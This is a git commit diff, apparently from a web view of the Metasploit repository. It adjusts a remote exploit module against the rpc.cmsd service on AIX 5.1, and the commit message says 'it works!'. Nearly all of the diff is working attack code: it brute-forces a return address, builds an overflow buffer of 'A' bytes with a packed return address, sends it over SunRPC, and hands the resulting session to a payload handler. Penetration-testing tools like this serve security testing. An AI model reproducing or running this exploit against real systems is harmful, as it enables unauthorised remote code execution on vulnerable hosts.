it works! don't forget to "set AIX <version>"
git-svn-id: file:///home/svn/framework3/trunk@8421 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
4a39cc13f6
commit
40579ce936
|
@ -57,10 +57,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Arch' => 'ppc',
|
||||
'Platform' => 'aix',
|
||||
'Ret' => 0xcafebabe,
|
||||
'AIX' => '5.1',
|
||||
'AIX' => '5.1',
|
||||
'Payload' => { 'AIX' => '5.1' },
|
||||
'Bruteforce' =>
|
||||
{
|
||||
#'Start' => { 'Ret' => 0x20230168 },
|
||||
#'Stop' => { 'Ret' => 0x20230168 },
|
||||
'Start' => { 'Ret' => 0x2022dfc8 },
|
||||
'Stop' => { 'Ret' => 0x2022dfc8 },
|
||||
'Step' => 1024
|
||||
|
@ -73,9 +75,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def brute_exploit(brute_target)
|
||||
begin
|
||||
print_status("Trying to exploit rpc.cmsd with address 0x%08x..." % brute_target['Ret'])
|
||||
|
||||
print_status("Trying to exploit rpc.cmsd with address 0x%x ..." % brute_target['Ret'])
|
||||
|
||||
begin
|
||||
if (not sunrpc_create('udp', 100068, 4))
|
||||
raise RuntimeError, 'sunrpc_create failed'
|
||||
end
|
||||
|
@ -88,15 +91,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sunrpc_call(7, xdr, 2)
|
||||
}
|
||||
|
||||
# debugger attach!
|
||||
#sleep(5)
|
||||
#print_status("ATTACH DEBUGGER NOW!"); sleep(5)
|
||||
|
||||
buf = "\x41" * payload_space
|
||||
buf << [brute_target['Ret']].pack('N')
|
||||
|
||||
xdr = XDR.encode(buf, "")
|
||||
sunrpc_authunix('localhost', 0, 0, [])
|
||||
sunrpc_call(21, xdr, 2)
|
||||
sunrpc_call(21, xdr, 1)
|
||||
|
||||
handler(sunrpc_callsock)
|
||||
sunrpc_destroy
|
||||
|
@ -109,4 +111,3 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue